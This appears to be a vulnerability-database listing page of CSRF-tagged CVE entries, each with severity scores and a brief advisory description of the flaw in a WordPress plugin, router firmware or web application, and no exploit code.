Aion versions up to 2.0 contain a vulnerability that allows cookies to be sent in cross-site requests, potentially increasing exposure to cr (CVSS 4.6).

CSRF Aion
NVD
CVE-2026-24666
EPSS 0% CVSS 6.5
MEDIUM POC This Month

The Open eClass platform (formerly known as GUnet eClass) is a complete course management system. [CVSS 6.5 MEDIUM]

CSRF Open Eclass Platform
NVD GitHub
CVE-2020-37103
EPSS 0% CVSS 6.4
MEDIUM POC This Month

DotNetNuke 9.5 contains a persistent cross-site scripting vulnerability that allows normal users to upload malicious XML files with executable scripts through journal tools. [CVSS 6.4 MEDIUM]

Dotnet XSS CSRF +1
NVD Exploit-DB
CVE-2026-25024
EPSS 0% CVSS 5.4
MEDIUM This Month

Blair Williams ThirstyAffiliates thirstyaffiliates is affected by cross-site request forgery (csrf) (CVSS 5.4).

CSRF
NVD
CVE-2026-25015
EPSS 0% CVSS 4.3
MEDIUM This Month

UsersWP plugin versions 1.2.53 and earlier contain a CSRF vulnerability that enables attackers to perform unauthorized actions on behalf of authenticated users without their knowledge. An attacker can craft malicious requests to modify user data or settings through a victim's browser session. No patch is currently available for this vulnerability.

CSRF
NVD
CVE-2026-25014
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthenticated attackers can perform Cross-Site Request Forgery (CSRF) attacks against users of Enter Addons version 2.3.2 and earlier, potentially modifying victim data through unwanted actions. The vulnerability requires user interaction to succeed but carries no authentication barriers, allowing attackers to forge requests that alter application state. No patch is currently available to remediate this issue.

CSRF
NVD
CVE-2026-24986
EPSS 0% CVSS 5.4
MEDIUM This Month

wp.insider Simple Membership WP user Import simple-membership-wp-user-import is affected by cross-site request forgery (csrf) (CVSS 5.4).

WordPress CSRF
NVD
CVE-2026-24966
EPSS 0% CVSS 4.3
MEDIUM This Month

Copyscape Copyscape Premium copyscape-premium is affected by cross-site request forgery (csrf) (CVSS 4.3).

CSRF
NVD
CVE-2026-24962
EPSS 0% CVSS 4.3
MEDIUM This Month

Sigmize through version 0.0.9 contains a cross-site request forgery vulnerability that allows unauthenticated attackers to perform unintended actions on behalf of authenticated users. The flaw requires user interaction but could enable unauthorized modifications or state changes within the application. No patch is currently available.

CSRF
NVD
CVE-2026-24942
EPSS 0% CVSS 4.3
MEDIUM This Month

magepeopleteam WpEvently mage-eventpress is affected by cross-site request forgery (csrf) (CVSS 4.3).

CSRF
NVD
CVE-2026-20704
EPSS 0% CVSS 4.3
MEDIUM This Month

Unauthenticated attackers can perform unauthorized actions on WRC-X1500GS-B and WRC-X1500GSA-B routers through cross-site request forgery attacks that exploit the lack of CSRF protections. An attacker can trick authenticated users into visiting a malicious webpage that silently executes unwanted commands on the affected device. No patch is currently available.

CSRF
NVD
CVE-2026-1447
EPSS 0% CVSS 5.4
MEDIUM This Month

Unauthenticated attackers can forge requests to create or modify contact notes in WordPress Mail Mint plugin versions up to 1.19.2 by exploiting missing CSRF protections, requiring only that a site administrator clicks a malicious link. The lack of input validation on these operations enables stored XSS attacks that could compromise administrator accounts and site integrity. No patch is currently available.

WordPress XSS CSRF
NVD
CVE-2026-25221
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

PolarLearn versions 0-PRERELEASE-15 and earlier lack proper state parameter validation in OAuth 2.0 authentication, enabling attackers to conduct login CSRF attacks against GitHub and Google login flows. An attacker can pre-authenticate a victim's session and trick them into logging into the attacker's account, causing the victim's data and academic progress to be stored on the attacker's account instead. Public exploit code exists for this vulnerability, and a patch is available.

Github CSRF Information Disclosure +1
NVD GitHub
CVE-2026-24007
EPSS 0% CVSS 4.6
MEDIUM PATCH This Month

Missing CSRF protection in Tuleap's Overview inconsistent items feature allows authenticated attackers to trick users into performing unwanted actions via crafted requests, potentially leading to unauthorized artifact link creation and data manipulation. The vulnerability affects multiple Tuleap versions and has been patched in Community Edition 17.0.99.1768924735 and Enterprise Edition 17.2-5, 17.1-6, and 17.0-9. This requires user interaction and valid credentials but poses a moderate risk to Tuleap deployments.

CSRF Tuleap
NVD GitHub
CVE-2022-50975
EPSS 0% CVSS 8.8
HIGH This Week

An unauthenticated remote attacker is able to use an existing session id of a logged in user and gain full access to the device if configuration via ethernet is enabled. [CVSS 8.8 HIGH]

CSRF
NVD

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
2101
